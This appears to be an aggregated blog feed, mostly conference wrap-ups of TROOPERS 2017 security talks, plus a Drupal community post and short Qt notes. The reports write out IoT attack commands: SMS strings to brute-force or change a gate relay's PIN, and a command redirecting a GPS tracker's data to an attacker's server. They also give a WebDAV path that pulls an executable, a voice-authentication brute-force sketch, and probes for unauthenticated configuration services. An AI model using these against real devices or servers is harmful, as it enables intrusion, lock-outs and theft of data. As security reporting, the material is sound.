The last talk, "Hacks & case studies: Cellular communications", was presented by Brian Butterly. Brian's motto is "to break things you must understand how they work". The first step: read as much as possible, then build your lab to play with the selected targets. Many IoT devices today use GSM networks so you can interact with them via SMS or calls; others also support TCP/IP communications (data). Brian gave a brief introduction to mobile networks and how to deploy your own. An important message from Brian: technically, nothing prevents you from broadcasting valid network IDs (but the law does :-).

It’s important to understand how a device connects to a mobile network:

  • First, connect to its home network if available
  • Otherwise, do NOT connect to a list of blacklisted networks
  • Then connect to the network with the strongest signal.

If you deploy your own mobile network, you can make target devices connect to your network and play MitM. So, what can we test? Brian reviewed different gadgets and how to abuse them / what are their weaknesses.

First case: a small GPS tracker with an emergency button, the Mini A8 (price: 15€). Just send an SMS with "DW" and the device will reply with an SMS containing the following URL:

http://gpsui.net/smap.php?lac=1&cellid=2&c=262&n=23&v=6890 Battery:70%

This is not a real GPS tracker: it returns the operator ("262" is Germany) and cell tower information. If you send "1111", it will enable the built-in microphone. When the SOS button is pressed, a message is sent to the "authorized" numbers. The second case was a gate relay (RTU5025 – 40€). It allows opening a door via SMS or call. It's just a relay in fact. Send "xxxxCC" (xxxx is the PIN) to unlock the door. Nothing is sent back if the PIN is wrong, which means that it's easy to brute force the device. Even better, once you have found the PIN, you can send "xxxxPyyyy" to replace the PIN xxxx with a new one yyyy (and lock out the owner!). The next case was the Smanos X300 home alarm system (150€). It can also be controlled by SMS or calls (to arm, disarm and get notifications). Here again, there is a lack of protection and it's easy to get the number, spoof an authorized number and just send a "1" or "0".

The next step was to check IP communications used by devices like the GPS car tracker (TK105 – 50€). You can change the server using the following message:

adminip 123456 101.202.101.202 9000

Then you define your own web server to receive the device data. Even more fun: the device has a relay that can be connected to the car's oil pump to turn the engine off (if the car is stolen). It also has a microphone and speaker. Of course, all communications occur over HTTP.

The last case was a Siemens module for PLCs (CMR 2020). It was not perfect but much better than the other devices. For example, passwords are not just 4-digit PIN codes but real alphanumeric passwords.

Two other examples: a smart meter sending UDP packets in clear text (with the meter serial number in all packets), and a solar system control box running Windows CE 6.x. Guess what? The only way to manage the system is via Telnet. Who said that Telnet is dead?

It’s over for today. Stay tuned for more news by tomorrow!

[The post TROOPERS 2017 Day #1 Wrap-Up was first published on /dev/random]

Xavier Mertens: TROOPERS 2017 Day #2 Wrap-Up


This is my wrap-up for the 2nd day of “NGI” at TROOPERS. My first choice for today was “Authenticate like a boss” by Pete Herzog. This talk was less technical than expected but interesting. It focussed on a complex problem: Identification. It’s not only relevant for users but for anything (a file, an IP address, an application, …). Pete started by providing a definition. Authentication is based on identification and authorisation. But identification can be easy to fake. A classic example is the hijacking of a domain name by sending a fax with a fake ID to the registrar – yes, some of them are still using fax machines! Identification is used at any time to ensure the identity of somebody to give access to something. It’s not only based on credentials or a certificate.

Identification is extremely important. You have to distinguish the good and the bad at any time. Not only people but also files, IOCs, threat intelligence actors, etc. For files, metadata can help with identification. Another example reported by Pete: the attribution of an attack. We cannot be 100% confident about the person or the group behind the attack. The next generation Internet needs more and more identification, especially with all those IoT devices deployed everywhere. We don't even know what the device is doing. Often, the identification process is not successful. How many times did you say "hello" to somebody on the street or while driving who turned out to be the wrong person? Why? Because we (as well as objects) are changing. We are getting older, wearing glasses, etc… Every interaction you have in a process increases your attack surface by the same amount as one vulnerability. What is more secure: letting a user choose his password or generating a strong one for him? He'll not remember it and will write it down somewhere. In the same way, what's best: a password or a certificate? An important concept explained by Pete is "intent". The problem is to have a good idea of the intent (from 0 – none – to 100% – certain).

Example: if an attacker is filling your firewall state table, is it a DoS attack? If somebody performs a traceroute to your IP addresses, is it footprinting? Can a port scan automatically be categorized as hunting? And will a vulnerability scan be immediately followed by an attempt to exploit? Not always… It's difficult to predict a specific action. To conclude, Pete mentioned machine learning as a tool that may help with indicators of intent.

After an expected coffee break, I switched to the second track to follow "Introduction to Automotive ECU Research" by Dieter Spaar. ECU stands for "Electronic Control Unit". It's a kind of brain present in modern cars that helps to control the car's behaviour and all its options. The idea of the research came after the problem that BMW faced with the unlocking of their cars. Dieter's motivations were multiple: engine tuning, speedometer manipulation, ECU repair, information privacy (what data is stored by a car?), the "VW scandal" and eCall (emergency calls). Sometimes, some features are just a question of ECU configuration: they are present but not activated. Also, from a privacy point of view, what do infotainment systems collect from your paired phone? How much data is kept by your GPS? ECUs depend on the car model and options. In the picture below, yellow blocks are activated ECUs, the others (grey) are optional (this picture is taken from an Audi A3 schema):

Audi A3 ECU

Interaction with the ECU is performed via a bus. There are different bus systems: the best known is CAN (Controller Area Network), next to MOST (Media Oriented Systems Transport), FlexRay, LIN (Local Interconnect Network), Ethernet or BroadR-Reach. Interesting fact: some BMW cars have an Ethernet port to speed up upgrades of the infotainment system (like GPS maps), as Ethernet provides more bandwidth to upload big files. ECU hardware is based on typical microcontrollers from Renesas, Freescale or Infineon. Infotainment systems run on ARM, sometimes x86, with QNX, Linux or Android. A special requirement is to provide a fast response time after power on. Dieter showed a lot of pictures of ECUs where you can easily identify the main components (radio, infotainment, telematics, etc). Many of them are manufactured by Peiker. This was a very quick introduction but it demonstrated that there is still room for plenty of research projects with cars. During the lunch break, I had an interesting chat with two people working at Audi. Security is clearly a hot topic for car manufacturers today!

For the next talk, I switched again to the other track and attended "PUF 'n' Stuf" by Jacob Torrey & Anders Fogh. The idea behind this strange title was "getting the most of the digital world through physical identities". The title came from a US TV show popular in the 60's. Today, within our ultra-connected digital world, we are moving our identity away from the physical world and it becomes difficult to authenticate somebody. We are losing the "physical" aspect. Humans can quickly spot an imposter just by looking at a picture or after a simple conversation, even without personally knowing the person. But authenticating people via a simple login/password pair is difficult in the digital world. The idea of Jacob & Anders was to bring strong physical identification into the digital world. The concept is called "PUF" or "Physically Uncloneable Function". To achieve this, they explained how to implement a challenge-response function for devices that should return responses that are as non-volatile as possible. This can be used to attest the execution state or generate device-specific data. They reviewed examples based on SRAM, EEPROM or CMOS/CCD. The last example is interesting: the technique is called PRNU and can be used to uniquely identify image sensors. It is often used in forensic investigations to link a picture to a camera. You can see this PUF as a second authentication factor. But there are caveats like a lack of proper entropy or PUF spoofing. Interesting idea but not easy to implement in practical cases.

After the lunch, Stefan Kiese had a two-hour slot to present "The Hardware Striptease Club". The idea of the presentation was to briefly introduce some components that we can find today in our smart houses and see how to break them from a physical point of view. Stefan briefly explained the methodology to approach those devices. When you do this, never forget the impact: loss of revenue, theft of credentials, etc… or worse, loss of life (pacemakers, cars). Some of the reviewed victims:

  • TP-Link NC250 (Smart home camera)
  • Netatmo weather station
  • BaseTech door camera
  • eQ-3 home control access point
  • Easy home wifi adapter
  • Netatmo Welcome

He gave a crash course in electronics but also insisted on the risks of playing with mains-powered devices! Then, people were able to open and disassemble the devices to play with them.

I didn't attend the second hour because another talk looked interesting: "Metasploit hardware bridge hacking" by Craig Smith. He works at Rapid7 and plays with all "moving" things, from cars to drones. To interact with those devices, a lot of tools and gadgets are required. The idea is to extend the Metasploit framework to be able to pentest these new targets. With an estimated 20.8 billion connected IoT devices (source: Gartner), pentesting projects around IoT devices will become more and more frequent. Many tools are required to test IoT devices: RF transmitters, USB fuzzers, RFID cloners, JTAG devices, CAN bus tools, etc. The philosophy behind Metasploit remains the same: it is based on modules (exploits, payloads, shellcodes). New modules are available to access relays which talk directly to the hardware. Example:

msf> use auxiliary/server/local_hwbridge

A Metasploit relay is a lightweight HTTP server that just makes JSON translations between the bridge and Metasploit.

Example: the ELM327 diagnostic module can be used via serial USB or Bluetooth. Once connected, all the classic framework features are available as usual:

./tools/hardware/elm327_relay.rb

Other supported relays are RF transmitters or Zigbee. This was an interesting presentation.

For the last time slot, there were two talks: one about vulnerabilities in TP-Link devices and one presented as "Looking through the web of pages to the Internet of Things". I chose the second one, presented by Gabriel Weaver. The abstract did not properly describe the topic (or I did not understand it) but the presentation was a review of the research performed by Gabriel: "CPTL" or "Cyber Physical Topology Language".

That closes the 2nd day. Tomorrow will be dedicated to the regular tracks. Stay tuned for more coverage.

[The post TROOPERS 2017 Day #2 Wrap-Up was first published on /dev/random]

Xavier Mertens: TROOPERS 2017 Day #3 Wrap-Up


The third day is already over! Today the regular talks were scheduled, split across three tracks: offensive, defensive and a specific one dedicated to SAP. The first slot at 09:00 was, as usual, a keynote. Enno Rey presented ten years of TROOPERS. What happened during all those editions? The main idea behind TROOPERS has always been that everybody must learn something by attending the conference but… with fun and many interactions with other peers! The goal was to mix infosec people coming from different horizons. And, of course, to use the stuff learned to contribute back to the community. Things changed a lot during these ten years; some are better while others remain the same (or got worse?). Enno reviewed all the keynotes presented and, for each of them, gave some comments – sometimes funny. The conference itself also evolved with a SAP track, the Telco Sec Day, the NGI track and the move to Heidelberg. Some famous vulnerabilities were covered like MS08-067 or the RSA hack. What we've seen:

  • A move from theory to practice
  • Some things/crap that stay the same (same shit, different day)
  • A growing importance of the socio-economic context around security.

Has progress been made? Enno reviewed infosec in three dimensions:

  • As a (scientific) discipline: From theory to practice. So yes, progress has been made
  • In enterprise environments: Some issues on endpoints have been fixed but there is a fact: Windows security has become much better but now they use Android :). Security in Datacenter also improved but now there is the cloud. 🙂
  • As a constituent for our society: Complexity is ever growing.

Are automated systems the solution? There are still technical and human factors that are important; "Errare Humanum Est", said Enno. Information security is still a work in progress but we have to work for it. Again, the example of the IoT crap was used. Education is key. So, yes, the TROOPERS motto is still valid: "Make the world a better place". Based on the applause from the audience, this was a great keynote by a visibly moved Enno!

I started my day in the defensive track. Veronica Valeros presented "Hunting Them All". Why do we need hunting capabilities? A definition of threat hunting is "to help in spotting attacks that would pass our existing controls and cause more damage to the business".

Veronica's Daily Job: Hunting!

People are constantly hit by threats (spam, phishing, malware, trojans, RATs, … you name them). Being always online also increases our attack surface. Attacks are very lucrative and attract a lot of bad guys. Sometimes, malware may change things. A good example comes with the ransomware plague: it made people aware that backups are critical. Threat hunting is not easy because when you are sitting on your network, you don't always know what to search for. And malicious activity does not always rely on top-notch technologies. Attackers are not all 'l33t'. They just want to bypass controls and make their malicious code run. To achieve this, they have a lot of time, they abuse the weakest link and they hide in plain sight. In short: they follow the "least effort" rule. Which sounds legit, right? Veronica has access to a lot of data. Her team performs hunting across hundreds of networks, millions of users and billions of web requests. How to process all this? Machine learning came to the rescue, and Veronica's job is to check and validate the output of the machine learning process they developed. But it's not a magic tool that will solve all issues. The focus must be on what's important: from 10B requests/day down to 20K incidents/day using anomaly detection, trust modelling, event classification, and entity & user modelling. Veronica gave an example: the Sality botnet has been active since 2003 and is still present. IOCs exist but they generate a lot of false positives, and regular expressions are not flexible enough. Can we create algorithms to automatically track malicious behaviour? For some threats it works, for others it doesn't. Veronica's team is tracking 200+ malicious behaviours and 60% of the tracking is automated. "Let the machine do the machine work". As a good example, Veronica explained how referrers can be the source of important data leaks from corporate networks.

My next choice was “Securing Network Automation” by Ivan Pepelnjak. In a previous talk, Ivan explained why Software Defined Networks failed, but many vendors improved, which is good. So today, his new topic was about ways to improve automation from a security perspective. Indeed, we must automate as much as possible, but how to make it reliable and secure? If a process is well defined, it can be automated, said Ivan. Why automate? From a management perspective, the same reasons always come up: increase flexibility while reducing costs, deploy faster and compete with public cloud offerings. About the cloud, do we need to buy or to build? In all cases, you’ll have to build if you want to automate. The real challenge is to move quickly from development to test and production. To achieve this, instead of editing a device configuration live, create configuration text files and push them to a GitLab server. Then you can virtualise a lab, pull the configs and test them. Did it work? Then merge into the main branch. A lot can be automated: device provisioning, VLAN management, ACLs, firewall rules. But the challenge is to have strong controls to prevent issues upfront and troubleshoot if needed. A nice quote was:

“To make a mistake is human; to automatically deploy that mistake to all the servers, use DevOps”

Remember the Amazon outage story? Be prepared to face issues. To automate, you need tools and such tools must be secure. An example was given with Ansible. The issue is that it gathers information from untrusted sources:

  • Scripts are executed on managed devices: what about data injection?
  • Custom scripts are included in data gathering: More data injection?
  • Returned data are not properly parsed: Risk of privilege escalation?

The usual controls to put in place are:

  • OOB management
  • Management network / VR
  • Limit access to the management hosts
  • SSH-based access
  • Use SSH keys
  • RBAC (commit scripts)

Keep in mind: your network is critical, so network automation (network programming) is too. Don’t write the code yourself (hire a skilled Python programmer for this task) but you must know what the code should do. Test, test, test and, once done, test again. As an example of control, you can run a traceroute before and after the change and compare the paths. Ivan published a nice list of requirements for your vendor while looking for a new network device. If your current vendor cannot provide basic requirements like an API, change vendors!
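
A minimal sketch of that before/after path check could look like this. This is my own illustration, not Ivan’s tooling; it assumes a Unix-like host with the traceroute binary available, and the target address is a placeholder.

# Sketch of a pre/post-change control: capture the forwarding path before and
# after an automated change and flag any difference.
import subprocess

def trace_path(target):
    """Return the list of hops reported by 'traceroute -n', one entry per hop."""
    out = subprocess.run(["traceroute", "-n", target],
                         capture_output=True, text=True, check=True)
    hops = []
    for line in out.stdout.splitlines()[1:]:     # first line is the header
        fields = line.split()
        if len(fields) > 1:
            hops.append(fields[1])               # hop address (or '*' on timeout)
    return hops

if __name__ == "__main__":
    target = "192.0.2.10"                        # placeholder target address
    before = trace_path(target)
    # ... the automated change would be deployed here ...
    after = trace_path(target)
    if before != after:
        print("Path changed after deployment, investigate before closing the change:")
        print("before:", before)
        print("after :", after)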

After the lunch, back to the defence & management track with “Vox Ex Machina” by Graeme Neilson. The title looked interesting: was it more offensive or defensive content? Voice recognition is more and more used (examples: Cortana, Siri, etc) but also on non-IT systems like banking or support systems: “Press 1 for X or press 2 for Y”. But is it secure? Voice recognition is not new hype. There are references to the “Voder” as early as 1939. Another system was the Vocoder a few years later. Voice recognition is based on two methods: phrase dependent or independent (this talk focused on the first method). The process is split into three phases:

  • Enrolment: you record a phrase x times. Each recording is slightly different and the analysis is stored as a voice print.
  • Authentication: Based on feature extraction or MFCC (Mel-Frequency Cepstral Coefficients).
  • Confidence: Returned as a percentage.

The next part of the talk focused on the tool developed by Graeme. Written in Python, it tests a remote API. The supported attacks are: replay, brute-force and voice print fixation. An important remark made by Graeme: even if some services pretend otherwise, your voice is NOT a key! Every time you pronounce a word, the generated file is different. That’s why the process of brute-forcing is completely different with voice recognition: you know when you are getting closer thanks to the returned confidence (in %), instead of a password comparison which returns “0” or “1”. The tool developed by Graeme is available here (or will be soon after the conference).
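
That feedback loop is what makes the attack practical. A hypothetical sketch follows (it is not Graeme’s tool; authenticate() is a placeholder for whatever remote API returns the confidence score):

# Hypothetical sketch: hill-climbing against an API that returns a confidence
# percentage instead of a yes/no answer.
def authenticate(candidate_print):
    """Placeholder for the remote voice API; should return a confidence in [0, 100]."""
    raise NotImplementedError("point this at the service under test")

def hill_climb(seed_print, mutate, rounds=1000):
    """Keep a mutation whenever the returned confidence goes up."""
    best, best_score = seed_print, authenticate(seed_print)
    for _ in range(rounds):
        candidate = mutate(best)
        score = authenticate(candidate)
        if score > best_score:        # feedback a plain true/false check never gives
            best, best_score = candidate, score
    return best, best_score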

The next talk was presented by Matt Graeber and Casey Smith: “Architecting a Modern Defense using Device Guard”. The talk was scheduled on the defensive track but it covered both worlds. The question that interests many people is: is whitelisting a good solution? Bad guys (and red teams) are trying to find bypass strategies. What are the mitigations available for the blue teams? The attacker’s goal is clear: execute HIS code on YOUR computer. There are two types of attackers: those who know what controls you have in place (enlightened) and the novices who aren’t equipped to handle your controls (ex: the massive phishing campaigns dropping Office documents with malicious macros). Device Guard offers the following protections:

  • Prevents unauthorised code execution,
  • Restricted scripting environment
  • Prevents policy tampering, and virtualisation-based security

The speakers were honest: Device Guard does NOT protect against all threats but it increases the noise (evidence) an attacker generates. Bypasses are possible. How?

  • Policy misconfiguration
  • Misplaced trust
  • Enlightened scripting environments
  • Exploitation of vulnerable code
  • Implementation flaws

The way you deploy your policy is key: it depends on your environment but also on the security ecosystem we live in. Would you trust all code signed by Google? Probably yes. Do you trust any certificate issued by Symantec? Probably not. The next part of the talk was a review of the different bypass techniques (offensive) and then some countermeasures (defensive). A nice demo was performed with PowerShell to bypass the constrained language mode. Keep in mind that some allowed applications might be vulnerable. Do you remember the VirtualBox signed driver vulnerability? Besides those problems, Device Guard offers many advantages:

  • Uncomplicated deployment
  • DLL enforcement implicit
  • Supported across windows ecosystem
  • Core system component
  • Powershell integration

Conclusion: whitelisting is often a huge debate (pro/con). Despite the flaws, it forces the adversaries to reset their tactics. By doing this you disrupt the attackers’ economics: if it makes the system harder to compromise, it will cost them more time/money.

After the afternoon coffee break, I switched to the offensive track again to follow Florian Grunow and Niklaus Schuss who presented “Exploring North Korea’s Surveillance Technology”. I had no idea about the content of the talk but it was really interesting and an eye-opener! It’s a fact: if it’s locked down, it must be interesting. That’s why Florian and Niklaus performed research on the systems provided to DPRK citizens (“Democratic People’s Republic of Korea“). The research was based on papers published by others and leaked devices / operating systems. They never went over there. The motivation behind the research was to get a clear view of the surveillance and censorship put in place by the government. It started with the Linux distribution called “Red Star OS”. It is based on Fedora/KDE across multiple versions and looks like a modern Linux distribution but… First finding: the certificates installed in the browser all come from the Korean authorities. Also, some suspicious processes cannot be killed. Integrity checks are performed on system files and downloaded files are changed on the fly by the OS (example: files transferred via a USB storage device). The OS adds a watermark at the end of the file which helps to identify the computer that was used. If the file is transferred to another computer, a second watermark is added, etc. This is a nice method to track dissidents and to build a graph of relations between them. Note that this watermark is only added to data files and that it can easily be removed. An antivirus is installed but can also be used to delete files based on their hash. Of course, the AV update servers are maintained by the government. After the desktop OS, the speakers reviewed some “features” installed on the “Woolim” tablet. This device is based on Android and does not have any connectivity onboard. You must use a specific USB dongle for this (provided by the government of course). When you try to open some files, you get a warning message “This is not signed file”. Indeed, the tablet can only work with files signed by the government or locally (based on RSA signatures). The goal, here again, is to prevent the distribution of media files. From a network perspective, there is no direct Internet access and all the traffic is routed through proxies. An interesting application running on the tablet is called “TraceViewer”. It takes a screenshot of the tablet at regular intervals. The user cannot delete the screenshots and random physical controls can be performed by authorities to keep the pressure on the citizens. This talk was really an eye-opener for me. Really crazy stuff!
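
The exact watermark format belongs to the speakers’ research and is not reproduced here, but the general class of trick (data silently appended to a copied file) is easy to illustrate. A generic sketch, assuming you still have a known-clean copy of the file to compare against; file names are placeholders:

# Generic sketch: detect bytes appended after the end of a known-clean copy of
# a file, the same class of trick as the watermark described above.
def trailing_bytes(clean_path, suspect_path):
    with open(clean_path, "rb") as a, open(suspect_path, "rb") as b:
        clean, suspect = a.read(), b.read()
    if suspect.startswith(clean) and len(suspect) > len(clean):
        return suspect[len(clean):]        # candidate watermark blob
    return b""

if __name__ == "__main__":
    blob = trailing_bytes("original.jpg", "copied_from_usb.jpg")   # placeholder paths
    if blob:
        print(len(blob), "unexpected trailing bytes:", blob[:32].hex())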

Finally, my last choice was another talk from the defensive track: “Arming Small Security Programs” by Matthew Domko. The idea is to generate a network baseline, exactly like we do for applications on Windows. For many organizations, the problem is to detect malicious activity on their network. Using an IDS quickly becomes useless due to the number and limitations of signatures. Matthew’s idea was to:

  • Build a baseline (all IPs, all ports)
  • Write snort rules
  • Monitor
  • Profit

To achieve this, he used the tool Bro. Bro is some kind of Swiss army knife for IDS environments. Matthew gave a quick introduction to the tool and, more precisely, focussed on the scripting capabilities of Bro. Logs produced by Bro are also easy to parse. The tool developed by Matthew implements a simple baseline script. It collects all connections to IP addresses / ports and logs what is NOT known. The tool is called Bropy and should be available soon after the conference. A nice demo was performed. I really liked the idea behind this tool but it should be improved and features added before being used in big environments. I would recommend having a look at it if you need to build a network activity baseline!
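
Bropy itself wasn’t published yet at the time of writing, but the underlying idea fits in a few lines. A minimal sketch of my own (not Matthew’s code), assuming Bro conn.log-style tab-separated records with the responder address and port in the 5th and 6th columns:

# Minimal baseline sketch in the spirit of the talk: learn the destination
# IP/port pairs seen during a baseline window, then report anything new.
def load_pairs(path):
    pairs = set()
    with open(path) as f:
        for line in f:
            if line.startswith("#"):               # skip Bro header lines
                continue
            fields = line.rstrip("\n").split("\t")
            if len(fields) > 5:
                pairs.add((fields[4], fields[5]))  # (id.resp_h, id.resp_p)
    return pairs

if __name__ == "__main__":
    baseline = load_pairs("conn_baseline.log")     # placeholder file names
    for pair in sorted(load_pairs("conn_today.log") - baseline):
        print("NEW:", pair)                        # candidate for an alert or rule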

The day ended with the classic social event. Local food, drinks and nice conversations with friends, which is priceless. I have to apologize for the delay in publishing this wrap-up. Complaints can be sent to Sn0rkY! 😉

[The post TROOPERS 2017 Day #3 Wrap-Up has been first published on /dev/random]


Philip Van Hoof: Perfection

Perfection has been reached not when there is nothing left to add, but when there is nothing left to take away.

Dries Buytaert: Living our values

The Drupal community is committed to welcome and accept all people. That includes a commitment to not discriminate against anyone based on their heritage or culture, their sexual orientation, their gender identity, and more. Being diverse has strength and as such we work hard to foster a culture of open-mindedness toward differences.

A few weeks ago, I privately asked Larry Garfield, a prominent Drupal contributor, to leave the Drupal project. I did this because it came to my attention that he holds views that are in opposition with the values of the Drupal project.

I had hoped to avoid discussing this decision publicly out of respect for Larry's private life, but now that Larry has written about it on his blog and it is being discussed publicly, I believe I have no choice but to respond on behalf of the Drupal project.

It's not for me to judge the choices anyone makes in their private life or what beliefs they subscribe to. I also don't take any offense to the role-playing activities or sexual preferences of Larry's alternative lifestyle.

What makes this difficult to discuss, is that it is not for me to share any of the confidential information that I've received, so I won't point out the omissions in Larry's blog post. However, I can tell you that those who have reviewed Larry's writing, including me, suffered from varying degrees of shock and concern.

In the end, I fundamentally believe that all people are created equally. This belief has shaped the values that the Drupal project has held since its early days. I cannot in good faith support someone who actively promotes a philosophy that is contrary to this. The Gorean philosophy promoted by Larry is based on the principle that women are evolutionarily predisposed to serve men and that the natural order is for men to dominate and lead.

While the decision was unpleasant, the choice was clear. I remain steadfast in my obligation to protect the shared values of the Drupal project. This is unpleasant because I appreciate Larry's many contributions to Drupal, because this risks setting a complicated precedent, and because it involves a friend's personal life. The matter is further complicated by the fact that this information was shared by others in a manner I don't find acceptable either and will be dealt with separately.

However, when a highly-visible community member's private views become public, controversial, and disruptive for the project, I must consider the impact that his words and actions have on others and the project itself. In this case, Larry has entwined his private and professional online identities in such a way that it blurs the lines with the Drupal project. Ultimately, I can't get past the fundamental misalignment of values.

Collectively, we work hard to ensure that Drupal has a culture of diversity and inclusion. Our goal is not just to have a variety of different people within our community, but to foster an environment of connection, participation and respect. We have a lot of work to do on this and we can't afford to ignore discrepancies between the espoused views of those in leadership roles and the values of our culture. It's my opinion that any association with Larry's belief system is inconsistent with our project's goals.

It is my responsibility and obligation to act in the best interest of the project at large and to uphold our values. Decisions like this are unpleasant and disruptive, but important. It is moments like this that test our commitment to our values. We must stand up and act in ways that demonstrate these values. For these reasons, I'm asking Larry to resign from the Drupal project.

(Comments on this post are allowed but for obvious reasons will be moderated.)

Xavier Mertens: TROOPERS 2017 Day #4 Wrap-Up

I’m just back from Heidelberg so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little bit more difficult due to the fatigue and the social event of yesterday. That’s why the wrap-up will be shorter…  The second keynote was presented by Mara Tam: “Magical thinking … and how to thwart it”. Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic remained classic. Mara explained her vision of the problems that the infosec community is facing when information must be exchanged with “the outside world”. Personally, I found that Mara’s slides were difficult to understand. 

For the first presentation of the day, I stayed in the main room – the offensive track – to follow “How we hacked distributed configuration management systems” by Francis Alexander and Bharadwaj Machhiraju. As we already saw yesterday with SDN, automation is a hot topic and companies tend to install specific tools to automate configuration tasks. Such software is called a DCM or “Distributed Configuration Management” system. They simplify the maintenance of complex infrastructures, synchronization and service discovery. But, like any software, they also have bugs or vulnerabilities and are, for a pentester, a nice target. They’re real goldmines because they contain not only configuration files; if an attacker can change them, it’s even more dangerous. A DCM can be agent-less or agent-based. The second case was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, they explained the vulnerability they found and how it was exploited up to remote code execution. The crazy part is that none of them has authentication enabled by default! To automate the search for DCMs and their exploitation, they developed a specific tool called Garfield. Nice demos were performed during the talk, with many remote shells and calc.exe spawned here and there.
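
The “no authentication by default” point is easy to check for yourself. A quick-and-dirty probe of my own (a sketch, not Garfield) against the default ports of the three tools could look like this; the target address is a placeholder and the endpoints may be locked down on hardened installs:

# Probe the default Consul/etcd HTTP APIs and the ZooKeeper client port for
# unauthenticated answers.
import socket
import urllib.request

def http_open(url, timeout=3):
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, r.read(200)
    except Exception as exc:
        return None, str(exc)

def zk_ruok(host, port=2181, timeout=3):
    """ZooKeeper speaks plain TCP; 'ruok' should be answered with 'imok' when alive."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"ruok")
            return s.recv(16)
    except OSError as exc:
        return str(exc).encode()

if __name__ == "__main__":
    host = "192.0.2.20"                                      # placeholder target
    print("consul   :", http_open(f"http://{host}:8500/v1/agent/self"))
    print("etcd     :", http_open(f"http://{host}:2379/version"))
    print("zookeeper:", zk_ruok(host))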

The next talk was my favourite of the day. It was about a tool called Ruler, used to pivot through Exchange servers. Etienne Stalmans presented his research on Microsoft Exchange and how he reverse engineered the protocol. The goal is simply to get a shell through Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users, so it exposes services on the Internet. How do you identify companies that use an Exchange server and how do you find it? Simply thanks to the auto-discovery feature implemented by Microsoft. If your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (plus other alternative URLs if this one isn’t useful). Etienne did some research and found that 10% of Internet domains have this process enabled. After some triage, he found that approximately 26000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute-force, rogue wireless AP, phishing or dumps of leaked databases). The exploitation itself is performed by creating a rule that will execute a script. The rule looks like: when the word “pwned” is present in the subject, start “badprogram.exe”. A very nice finding is the way Windows converts a UNC path to WebDAV:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdav/pew.zip

And Windows will even extract s.exe for you! Magic!

Etienne performed a nice demo of Ruler which automates all the process described above. Then, he demonstrated another tool called Linial which takes care of persistence. To conclude, Etienne briefly explained how to harden Exchange to prevent this kind of attack. Outlook 2016 blocks unsafe rules by default, which is good. An alternative is to block WebDAV and use MFA.
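
The reconnaissance step described above is straightforward to reproduce. A hedged sketch of my own (only the primary autodiscover URL is probed; Outlook and Ruler try several fallbacks, and the domains below are placeholders):

# Does a domain expose the Exchange autodiscover endpoint?
import urllib.error
import urllib.request

def has_autodiscover(domain, timeout=5):
    url = f"https://{domain}/autodiscover/autodiscover.xml"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status in (200, 401, 403)     # an auth prompt still reveals it
    except urllib.error.HTTPError as exc:
        return exc.code in (401, 403)
    except Exception:
        return False

if __name__ == "__main__":
    for domain in ("example.com", "example.org"):  # placeholder domains
        print(domain, has_autodiscover(domain))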

After the lunch, Zoz came back with another funny presentation: “Data Demolition: Gone in 60 seconds!”. The idea is simple: when you throw away devices, you must be sure that they don’t contain any remaining critical data. Classic examples are hard drives and printers, but also extremely mobile devices like drones. The talk was some kind of “Myth Busters” show for hard drives! Different techniques were tested by Zoz:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with small videos. Crazy!

Destroying HD's

What was interesting to notice is that most techniques failed because the disk platters could still be “cleaned” (ex: removing the dust) and might become readable again using forensic techniques. For your information, the most feasible techniques were: plasma cutter or oxygen injector, nailguns and HV power spike. Just one piece of advice: don’t try this at home!

There was a surprise talk scheduled. The time slot was offered to The Grugq. A renowned security researcher, he presented “Surprise Bitches, Enterprise Security Lessons From Terrorists”. He talked about APTs but not as a buzzword: he gave his own view of how APTs work. For him, the term “APT” was invented by Americans and means “Asia Pacific Threat“.

I finished the day back in the offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented “Exploring the Infrared, part 2“. The first part was presented at ShmooCon. Fortunately, they started with a quick recap: what is infrared light and what are its applications (remote controls, sensors, communications, heating systems, …). The talk was a series of nice demos where they used replay attack techniques to abuse tools/toys that work with IR, like a Duck Hunt game or a shark remote controller. The most impressive one was the replay attack against the Bosch audio transmitter. This very expensive device is used at big events for instant translation. They reverse engineered the protocol and were able to play a song through the device… You can imagine the impact of such an attack during a live event (ex: switching voices, replacing translations by others, etc). They have many more tests in the pipeline.

IR Fun

The last talk was “Blinded Random Block Corruption” by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and always provides good content. His presentation was very impressive. The idea is to evaluate the problems around memory encryption: how and why to use it? Physical access to the victim is the worst case: an attacker has access to everything. You implemented full-disk encryption? Cool, but a lot of information is in memory when the system is running. Access to memory can be performed via Firewire, PCIe, PCMCIA and new USB standards. What about memory encryption? It’s good, but encryption alone is not enough: controls must be implemented. The attack explained by Rodrigo is called “BRBC” or “Blinded Random Block Corruption“. After giving the details, a nice demo was performed: how to become root on a locked system. Access to memory is easier in virtualized (or cloud) environments. Indeed, many hypervisors allow enabling a “debug” feature per VM. Once activated, the administrator has write access to the memory. By using a debugger, you can apply the BRBC attack and bypass the login procedure. The video demo was impressive.

So, the TROOPERS 10th anniversary edition is over. I spent four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my todo-list has already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]

Philip Van Hoof: Making something that is undoable editable with Qt

Among the problems we’ll face are that we want asynchronous APIs that are undoable, that we want to switch between read-only, undoable editing and non-undoable editing, and that QML doesn’t really work well with QFuture. At least not yet. We want an interface that is easy to talk with from QML. Yet we want to switch between complicated behaviors.

We will also want synchronous mode and asynchronous mode. Because I just invented that requirement out of thin air.

